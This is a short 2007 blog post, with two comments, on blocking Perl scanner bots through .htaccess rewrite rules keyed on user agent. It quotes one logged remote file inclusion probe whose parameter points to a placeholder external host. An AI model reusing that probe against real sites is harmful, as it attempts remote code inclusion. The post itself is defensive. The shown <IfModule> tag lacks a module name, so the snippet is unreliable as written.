I see Perl bots crawling my website hundreds of times a month because I have posted some vulnerabilities here that show up in Google, thus making the bot think my site is vulnerable. This isn't a big deal as far as my site being defaced - I don't run the things they look for. However, it is quite an annoyance to see hundreds and hundreds of requests that look like this:
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xxx? Http Code: 301 Date: Sep 19 18:50:37 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.79
So I added this to my .htaccess file, and poof. They get a 403.
<IfModule>
RewriteCond %{HTTP_USER_AGENT} ^lwp- [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-
RewriteRule ^.* - [F,L]
</IfModule>
You can add any User-Agents you want to with this, I just chose some common ones. This needs to go at the top of the .htaccess file if you have something like WordPress permalink redirects set up in your .htaccess.




October 16th, 2007 at 10:41 pm
Nice one, you could also issue a 410 gone header with
RewriteRule .* - [R=410,L]
October 17th, 2007 at 5:54 pm
Yeah, that's another good option, this was just an example I came up with after getting frustrated with bots. Now that I come to think of it, the 410 would probably confuse the bot more, so maybe that would be a better one to use anyway.